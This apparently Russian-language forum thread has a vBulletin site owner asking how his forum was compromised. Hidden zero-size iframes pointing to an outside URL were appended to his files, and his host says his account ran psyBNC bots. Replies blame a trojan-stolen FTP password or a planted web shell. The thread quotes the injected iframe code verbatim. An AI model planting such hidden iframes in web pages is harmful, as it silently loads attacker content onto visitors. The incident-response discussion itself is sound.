Всем привет.
Началось пару недель назад. У юзеров стали появляться ошибки с куками при работе форума. Оказалось, что в конец всех файлов был дописан код

Code:

<IFRAME src="http://gothamcomputers.com/dompu/cmd/henca.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://gothamcomputers.com/dompu/cmd/henca.html" width="0" height="0" frameborder="0"></iframe>

Поборол восстановлением бэкапа. Это повторялось несколько раз. Сначала думал, что увели пароли фтп, но и после смены пароля это повторилось (пароль нигде не хранится). Комп на вирусы проверен. Посмотрев в логи фтп, никого кроме себя не обнаружил. Следов того, что меняли все файлы, нет.

Это еще полбеды. На днях начал тормозить форум, периодически он просто лежал. Обратился к хостеру за разъянениями. Оказалось, что мой аккаунт (по словам хостера) запускает ботов и вредоносное ПО Tembilahan-bot psyBNC 2.3.2. Это ПО обычно загружается через скрипты и дыры в них. ФТП для этого не используют, что и по логам видно. Хостер (http://www.eserver.ru) клянется и божится, что это дыры в моих скриптах, т.е. в вобле. На аккаунте есть еще два мелких сайта, но они на чистом html.

Отсюда вопрос: как это лечить и как этому противодействовать?

Установленные хаки:

• ipInfo 1.0 (ipInfo is a replacement standard view users ip)
• New posts and reputation comments 3.18 (Показывает количество новых сообщений с вашего последнего визита, и количество новых комментарий репутации если имеются. перевод kontra)
• Автоматическая отправка личного сообщения при моде 3.6.2 (Автоматическая отправка личного сообщения пользователям, если их тема была отредактирована. Перевод и доработка - AnTekapb)
• Отображение ботов 1.4 (Отображение поисковых ботов в списке пользователей онлайн. Перевод выполнил Ateist)
• Система предупреждений 3.6.x 3.6.8 (Система предупреждений с расширенными возможностями. Автор — Damned Tiny)
• Смайлы в форме быстрого ответа 1.0.0 (Добавляет выпадающее меню со смайлами в форму быстрого ответа)
• Хак Благодарностей для 3.6.8 6.3 (Перевод осуществил "FintMax")
• [NuHIT] - NuSEO.PHP 1.6 (NuHIT's NuSEO.PHP)

Добавлено через 7 минут
По ошибке запостил в раздел другой версии. Переместите плз.

mikael, Это не связано с булкой. У кого-то, кто имеет доступ к ftp трояном увели пароль

mikael, посмотри свой фтп на наличие шеллов...

Quote:

Originally Posted by mikael

http://www.eserver.ru

хостился у них полтора года
лентяи каких свет не видовал
одни отмазки, это не мы, это ваши баги и т.д.

Quote:

Originally Posted by zCarot

mikael, Это не связано с булкой. У кого-то, кто имеет доступ к ftp трояном увели пароль

Кроме меня, ни у кого доступа нет.

Добавлено через 57 секунд

Quote:

Originally Posted by AntiPiton

mikael, посмотри свой фтп на наличие шеллов...

Рад бы, да не знаю как
К тому же это виртуальный хостинг, так что мои права там крайне ограничены. Сейчас переезжаю на VDS (ruweb.net). Вот и думаю, а не притащу ли я эту заразу туда.

Добавлено через 3 минуты

Quote:

Originally Posted by Мик

хостился у них полтора года
лентяи каких свет не видовал
одни отмазки, это не мы, это ваши баги и т.д.

Согласен, лентяи еще те. Это не считая других геморов.

mikael, ну давайте вместе попробуем пошевелить мозгом. Я думаю Вы согласны с тем, что ничего просто так не бывает, как и чудес тоже не может быть (ну, по крайней мере, на сервере). Вы говорите, что только у Вас есть доступ к ftp. Тогда есть три варианта:

1. Вирус на сервере.
2. Кто-то воспользовался вашим ftp-доступом.
3. Вы залили на сервер изначально криптованный дистрибутив воблы.

Все! В Вашей ситуации других разумных причин не придумать. Исходя из этого имеем по пунктам:

1. Маловероятно, но все же возможно. Стучите к хостеру.
2. Надо знать что такое ftp-защита и пользоваться ей. Так же, не сохранять пароли в формах браузера и переодически их менять. Ну и конечно не юзать простые пароли.
3. Надо думать откуда качаете дистрибутив Воблы.

Как видите, почти во всех случаях виноваты Вы и только Вы. И как теперь избавляться от этого решать только Вам, исходя из ситуации...

Quote:

Originally Posted by Sellrion

1. Вирус на сервере.
2. Кто-то воспользовался вашим ftp-доступом.
3. Вы залили на сервер изначально криптованный дистрибутив воблы.

Все! В Вашей ситуации других разумных причин не придумать. Исходя из этого имеем по пунктам:

1. Маловероятно, но все же возможно. Стучите к хостеру.
2. Надо знать что такое ftp-защита и пользоваться ей. Так же, не сохранять пароли в формах браузера и переодически их менять. Ну и конечно не юзать простые пароли.
3. Надо думать откуда качаете дистрибутив Воблы.

1. Стучал. Хостер в грудь бьется, что это дырявые скрипты. Скриптов, кроме воблы на аккаунте нет.
2. Пароли и так длиннее некуда. В формах сохранял раньше, но потом передумал
3. Все дистрибутивы отсюда.

mikael, шевелите же мозгом! Вот это:

Quote:

Originally Posted by Sellrion

Я думаю Вы согласны с тем, что ничего просто так не бывает, как и чудес тоже не может быть (ну, по крайней мере, на сервере). Вы говорите, что только у Вас есть доступ к ftp.

говорит о том что одно из этих утвержений:

Quote:

Originally Posted by mikael

1. Стучал. Хостер в грудь бьется, что это дырявые скрипты. Скриптов, кроме воблы на аккаунте нет.
2. Пароли и так длиннее некуда. В формах сохранял раньше, но потом передумал
3. Все дистрибутивы отсюда.

не соответсвует действительности вопреки Вашим убеждениям. Хотите Вы того или нет. К сожалению мы не можем Вам помочь, ибо экстрасенсов тут нет...

Quote:

Кроме меня, ни у кого доступа нет.

Троян. Троян на компе. Который исправно передает кому надо все ваши изменения пароля к фтп.

Спорим, пароль сохранен в тотал коммандере? Или чем вы там пользуетесь )

+ к этому - ищем шелл.
Умный "хакер" в первую очередь, заливает шелл в укромное местечко.
И только потом вешает ифрейм.

Ясно. Всем спасибо.